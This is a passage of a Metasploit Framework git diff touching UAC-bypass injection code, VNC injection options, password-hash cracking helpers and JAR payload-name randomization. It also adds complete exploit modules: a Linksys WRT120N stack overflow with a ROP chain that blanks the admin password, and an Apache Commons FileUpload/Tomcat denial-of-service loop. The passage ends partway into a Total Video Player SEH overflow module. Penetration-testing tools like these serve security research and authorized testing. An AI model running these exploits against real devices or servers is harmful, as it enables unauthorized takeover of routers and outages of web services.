if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
{
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't get path to self");
return;
}
@ -231,7 +229,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (S_OK != hr)
{
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"SHGetFolderPath failed");
return;
}
@ -240,7 +237,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
if (hModKernel32 == 0)
{
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't load kernel32.dll");
return;
}
@ -257,7 +253,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
|| 0 == tfpWaitForSingleObject.f)
{
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't find API");
}
else
{
@ -374,26 +369,11 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
if (reme.AnyFailures())
{
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Remote allocation failed");
}
else
if (!(reme.AnyFailures()))
{
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
if (hRemoteThread == 0)
{
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(
CError::Format(
GetLastError(),
L"Couldn't create remote thread",
L"CreateRemoteThread"));
}
else
if (hRemoteThread != 0)
{
if ( Redirector )
Redirector();
@ -415,7 +395,6 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
else
{
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
// See if it completed before the user asked to stop waiting.
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
@ -442,14 +421,4 @@ void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD d
FreeLibrary(hModKernel32);
if (bThreadWaitFailure)
{
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Error waiting on the remote thread to complete");
}
else if (bThreadWaitSuccess)
{
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
CLogger::LogLine(L"Remote thread completed");
}
}

16
external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Utils.cpp vendored Normal file → Executable file
View File

@ -33,7 +33,6 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
if (hSnapshot == INVALID_HANDLE_VALUE)
{
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
}
else
{
@ -61,17 +60,7 @@ bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapPro
{
DWORD dwErr = GetLastError();
if (ERROR_NO_MORE_FILES != dwErr)
{
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First failed");
}
else if (mapProcs.empty())
{
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First returned nothing");
}
else
if ((ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty()))
{
bResult = true;
}
@ -107,7 +96,6 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
if (szProcName == NULL)
{
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"No process name passed in");
return false;
}
@ -140,7 +128,7 @@ bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPi
}
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(strMsg);
return false;
}

View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
@ -28,23 +28,27 @@
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
@ -64,25 +68,30 @@
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<GenerateManifest>false</GenerateManifest>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -90,11 +99,16 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<MinimalRebuild>false</MinimalRebuild>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
@ -102,11 +116,16 @@
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<MinimalRebuild>false</MinimalRebuild>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
@ -117,6 +136,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -124,6 +144,9 @@
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -134,6 +157,7 @@
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -145,6 +169,9 @@
<Path>
</Path>
</BuildLog>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />

3
external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp vendored Normal file → Executable file
View File

@ -17,7 +17,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
// Wee need to hide fact that we've started process thats why we immediately
// Terminate host application.
//
CLogger::LogLine(TEXT("DLL: Hello"));
switch (ul_reason_for_call)
{
@ -33,8 +32,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
startupInfo.cb = sizeof(startupInfo);
PROCESS_INFORMATION processInfo = {0};
CLogger::LogLine(TEXT("DLL: TIOR shell="));
CLogger::LogLine(cmd);
//
// Create not visible window

View File

@ -0,0 +1,19 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\Win7Elevate.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building bypassuac x86" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="Building bypassuac x64" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>

View File

@ -48,7 +48,14 @@ IF "%ERRORLEVEL%"=="0" (
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building bypassuac_injection"
ECHO "Building bypassuac (on-disk)"
PUSHD bypassuac
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building bypassuac (in-memory)"
PUSHD bypassuac_injection
msbuild.exe make.msbuild /target:%PLAT%
POPD

View File

@ -152,14 +152,18 @@ class VncInject
# Note that this says nothing about whether it worked, only that we found
# the file.
#
def autovnc
def autovnc(viewonly=true)
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
Rex::FileUtils::find_full_path('vncviewer.exe')
if (vnc)
args = []
args.push '-viewonly' if viewonly
args.push "#{vlhost}::#{vlport}"
self.view = framework.threads.spawn("VncViewerWrapper", false) {
system("vncviewer #{vlhost}::#{vlport}")
system(vnc, *args)
}
return true

View File

@ -22,6 +22,18 @@ module VncInjectOptions
"The local host to use for the VNC proxy",
'127.0.0.1'
]),
OptBool.new('DisableCourtesyShell',
[
false,
"Disables the Metasploit Courtesy shell",
true
]),
OptBool.new('ViewOnly',
[
false,
"Runs the viewer in view mode",
true
]),
OptBool.new('AUTOVNC',
[
true,
@ -32,12 +44,6 @@ module VncInjectOptions
register_advanced_options(
[
OptBool.new('DisableCourtesyShell',
[
false,
"Disables the Metasploit Courtesy shell",
false
]),
OptBool.new('DisableSessionTracking',
[
false,
@ -79,7 +85,7 @@ module VncInjectOptions
# If the AUTOVNC flag is set, launch VNC viewer.
if (datastore['AUTOVNC'] == true)
if (session.autovnc)
if (session.autovnc(datastore['ViewOnly']))
print_status("Launched vncviewer.")
else
print_error("Failed to launch vncviewer. Is it installed and in your path?")

View File

@ -135,14 +135,21 @@ module Auxiliary::JohnTheRipper
::IO.popen(cmd, "rb") do |fd|
fd.each_line do |line|
line.chomp!
print_status(line)
if line =~ /(\d+) password hash(es)* cracked, (\d+) left/m
res[:cracked] = $1.to_i
res[:uncracked] = $2.to_i
end
bits = line.split(':')
bits = line.split(':', -1)
# If the password had : characters in it, put them back together
while bits.length > 7
bits[1,2] = bits[1,2].join(":")
end
next if not bits[2]
if (format== 'lm' or format == 'nt')
res[ :users ][ bits[0] ] = bits[1]
else
@ -201,7 +208,14 @@ module Auxiliary::JohnTheRipper
end
def john_wordlist_path
::File.join(john_base_path, "wordlists", "password.lst")
# We ship it under wordlists/
path = ::File.join(john_base_path, "wordlists", "password.lst")
# magnumripper/JohnTheRipper repo keeps it under run/
unless ::File.file? path
path = ::File.join(john_base_path, "run", "password.lst")
end
path
end
def john_binary_path
@ -209,6 +223,7 @@ module Auxiliary::JohnTheRipper
if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
path = datastore['JOHN_PATH']
::FileUtils.chmod(0755, path) rescue nil
return path
end
if not @run_path

View File

@ -3487,16 +3487,29 @@ class DBManager
sname = $6
end
when /^[\s]*Warning:/
next # Discard warning messages.
when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/ # SMB Hash
# Discard warning messages.
next
# SMB Hash
when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
ptype = "smb_hash"
when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/ # SMB Hash
# SMB Hash
when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
pass = ""
ptype = "smb_hash"
when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n # Must be a user pass
# SMB Hash with cracked plaintext, or just plain old plaintext
when /^[\s]*([^\s:]+):(.+):[A-Fa-f0-9]*:[A-Fa-f0-9]*:::$/
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
ptype = "password"
# Must be a user pass
when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n
user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)
pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)
ptype = "password"

View File

@ -149,11 +149,11 @@ class Export
report_file.puts "Warning: could not read the private key '#{c.pass}'."
end
end
else "text"
when "text"
data.each do |c|
user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.user, true)
pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.pass, true)
report_file.write "%s %s\n" % [user,pass]
report_file.write "%s:%s:::\n" % [user,pass]
end
end
report_file.flush
@ -372,7 +372,7 @@ class Export
def extract_module_detail_info(report_file)
Mdm::Module::Detail.all.each do |m|
report_file.write("<module_detail>\n")
m_id = m.attributes["id"]
#m_id = m.attributes["id"]
# Module attributes
m.attributes.each_pair do |k,v|

View File

@ -139,8 +139,10 @@ protected
# Prefer the target's platform/architecture information, but use
# the module's if no target specific information exists
opts[:platform] ||= payload_instance.platform if self.respond_to? :payload_instance
opts[:platform] ||= target_platform if self.respond_to? :target_platform
opts[:platform] ||= platform if self.respond_to? :platform
opts[:arch] ||= payload_instance.arch if self.respond_to? :payload_instance
opts[:arch] ||= target_arch if self.respond_to? :target_arch
opts[:arch] ||= arch if self.respond_to? :arch
end

View File

@ -42,6 +42,8 @@ module Msf::Payload::Java
#
# @option opts :main_class [String] the name of the Main-Class
# attribute in the manifest. Defaults to "metasploit.Payload"
# @option opts :random [Boolean] Set to `true` to randomize the
# "metasploit" package name.
# @return [Rex::Zip::Jar]
def generate_jar(opts={})
raise if not respond_to? :config
@ -54,6 +56,7 @@ module Msf::Payload::Java
] + @class_files
jar = Rex::Zip::Jar.new
jar.add_sub("metasploit") if opts[:random]
jar.add_file("metasploit.dat", config)
jar.add_files(paths, File.join(Msf::Config.data_directory, "java"))
jar.build_manifest(:main_class => main_class)

View File

@ -120,6 +120,23 @@ module Msf::Post::Common
return o
end
def cmd_exec_get_pid(cmd, args=nil, time_out=15)
case session.type
when /meterpreter/
if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/
args = ""
end
session.response_timeout = time_out
process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true})
process.channel.close
pid = process.pid
process.close
pid
else
print_error "cmd_exec_get_pid is incompatible with non-meterpreter sessions"
end
end
#
# Reports to the database that the host is a virtual machine and reports
# the type of virtual machine it is (e.g VirtualBox, VMware, Xen)

View File

@ -824,10 +824,15 @@ class Db
tbl = Rex::Ui::Text::Table.new(tbl_opts)
creds_returned = 0
inactive_count = 0
# Now do the actual search
framework.db.each_cred(framework.db.workspace) do |cred|
# skip if it's inactive and user didn't ask for all
next unless (cred.active or inactive_ok)
if !cred.active && !inactive_ok
inactive_count += 1
next
end
if search_term
next unless cred.attribute_names.any? { |a| cred[a.intern].to_s.match(search_term) }
end
@ -876,8 +881,15 @@ class Db
end
print_line
if (output_file == nil)
if output_file.nil?
print_line(tbl.to_s)
if !inactive_ok && inactive_count > 0
# Then we're not printing the inactive ones. Let the user know
# that there are some they are not seeing and how to get at
# them.
print_line "Also found #{inactive_count} inactive creds (`creds all` to list them)"
print_line
end
else
# create the output file
::File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }

View File

@ -972,6 +972,7 @@ require 'msf/core/exe/segment_injector'
spawn = opts[:spawn] || 2
exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
zip = Rex::Zip::Jar.new
zip.add_sub("metasploit") if opts[:random]
paths = [
[ "metasploit", "Payload.class" ],
]

View File

@ -15,6 +15,17 @@ module Zip
#
class Jar < Archive
attr_accessor :manifest
# @!attribute [rw] substitutions
# The substitutions to apply when randomizing. Randomization is designed to
# be used in packages and/or classes names.
#
# @return [Hash]
attr_accessor :substitutions
def initialize
@substitutions = {}
super
end
#
# Create a MANIFEST.MF file based on the current Archive#entries.
@ -35,8 +46,8 @@ class Jar < Archive
# The SHA1-Digest lines are optional unless the jar is signed (see #sign).
#
def build_manifest(opts={})
main_class = opts[:main_class] || nil
app_name = opts[:app_name] || nil
main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil)
existing_manifest = nil
@manifest = "Manifest-Version: 1.0\r\n"
@ -224,6 +235,47 @@ class Jar < Archive
return true
end
# Adds a file to the JAR, randomizing the file name
# and the contents.
#
# @see Rex::Zip::Archive#add_file
def add_file(fname, fdata=nil, xtra=nil, comment=nil)
super(randomize(fname), randomize(fdata), xtra, comment)
end
# Adds a substitution to have into account when randomizing. Substitutions
# must be added immediately after {#initialize}.
#
# @param str [String] String to substitute. It's designed to randomize
# class and/or package names.
# @param bad [String] String containing bad characters to avoid when
# applying substitutions.
# @return [String] The substitution which will be used when randomizing.
def add_sub(str, bad = '')
if @substitutions.key?(str)
return @substitutions[str]
end
@substitutions[str] = Rex::Text.rand_text_alpha(str.length, bad)
end
# Randomizes an input by applying the `substitutions` available.
#
# @param str [String] String to randomize.
# @return [String] The input `str` with all the possible `substitutions`
# applied.
def randomize(str)
return str if str.nil?
random = str
@substitutions.each do |orig, subs|
random = str.gsub(orig, subs)
end
random
end
end
end

View File

@ -0,0 +1,109 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
to reset the password of the management interface temporarily to an empty value.
This module has been tested successfully on a WRT120N device with firmware version
1.0.07.
},
'Author' =>
[
'Craig Heffner', #vulnerability discovery and original exploit
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31758' ],
[ 'OSVDB', '103521' ],
[ 'URL', 'http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/' ] # a huge amount of details about this vulnerability and the original exploit
],
'DisclosureDate' => 'Feb 19 2014'))
end
def check_login(user)
print_status("#{peer} - Trying to login with #{user} and empty password")
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'authorization' => basic_auth(user,"")
})
if res.nil? || res.code == 404
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
elsif [200, 301, 302].include?(res.code)
print_good("#{peer} - Successful login #{user} and empty password")
return true
else
print_status("#{peer} - No successful login possible with #{user} and empty password")
return false
end
end
def run
begin
if check_login("admin")
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
return
end
rescue ::Rex::ConnectionError
print_error("#{peer} - Failed to connect to the web server")
return
end
print_status("#{peer} - Resetting password for the admin user ...")
postdata = Rex::Text.rand_text_alpha(246) # Filler
postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory
postdata << [0x8031f634].pack("N") # $ra
postdata << Rex::Text.rand_text_alpha(40) # Stack filler
postdata << Rex::Text.rand_text_alpha(4) # Stack filler
postdata << [0x803471b8].pack("N") # ROP 1 $ra (address of ROP 2)
postdata << Rex::Text.rand_text_alpha(8) # Stack filler
(0..3).each do |i|
postdata << Rex::Text.rand_text_alpha(4) # ROP 2 $s0, don't care
postdata << Rex::Text.rand_text_alpha(4) # ROP 2 $s1, don't care
postdata << [0x803471b8].pack("N") # ROP 2 $ra (address of itself)
postdata << Rex::Text.rand_text_alpha(4-(3*(i/3))) # Stack filler
end
begin
res = send_request_cgi(
{
'uri' => normalize_uri("cgi-bin", "tmUnblock.cgi"),
'method' => 'POST',
'vars_post' => {
'period' => '0',
'TM_Block_MAC' => '00:01:02:03:04:05',
'TM_Block_URL' => postdata
}
})
if res and res.code == 500
if check_login("admin")
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
else
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
end
else
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
end
rescue ::Rex::ConnectionError
print_error("#{peer} - Failed to connect to the web server")
return
end
end
end

View File

@ -68,6 +68,9 @@ class Metasploit3 < Msf::Auxiliary
cracked_lm = {}
added = []
john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'lm')
john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'nt')
# Crack this in LANMAN format using wordlist mode with tweaked rules
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')

View File

@ -0,0 +1,76 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
'Description' => %q{
This module triggers an infinite loop in Apache Commons FileUpload 1.0
through 1.3 via a specially crafted Content-Type header.
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
uses Commons FileUpload as part of the Manager application.
},
'Author' =>
[
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
'ribeirux' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-0050'],
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
['URL', 'http://tomcat.apache.org/security-8.html'],
['URL', 'http://tomcat.apache.org/security-7.html']
],
'DisclosureDate' => 'Feb 6 2014'
))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, "The request URI", '/']),
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
], self.class)
end
def run
boundary = "0"*4092
opts = {
'method' => "POST",
'uri' => normalize_uri(target_uri.to_s),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => "#{boundary}00000",
'headers' => {
'Accept' => '*/*'
}
}
for x in 1..datastore['RLIMIT']
print_status("Sending request #{x} to #{peer}")
begin
c = connect
r = c.request_cgi(opts)
c.send_request(r)
# Don't wait for a response
rescue ::Rex::ConnectionError => exception
print_error("#{peer} - Unable to connect: '#{exception.message}'")
return
ensure
disconnect(c) if c
end
end
end
end

View File

@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
res = r[0].to_s.strip
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
report_service(:host => rhost, :port => rport, :proto => "udp", :name => "chargen", :info => res.length)
end
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused

View File

@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
# If we haven't returned yet, then this is a request for our applet
# jar, build one for this victim.
jar = p.encoded_jar
jar = p.encoded_jar(:random => true)
jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)

View File

@ -0,0 +1,73 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mike Czumak', # (T_v3rn1x) -- @SecuritySift
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '100619' ],
[ 'EDB', '29799' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
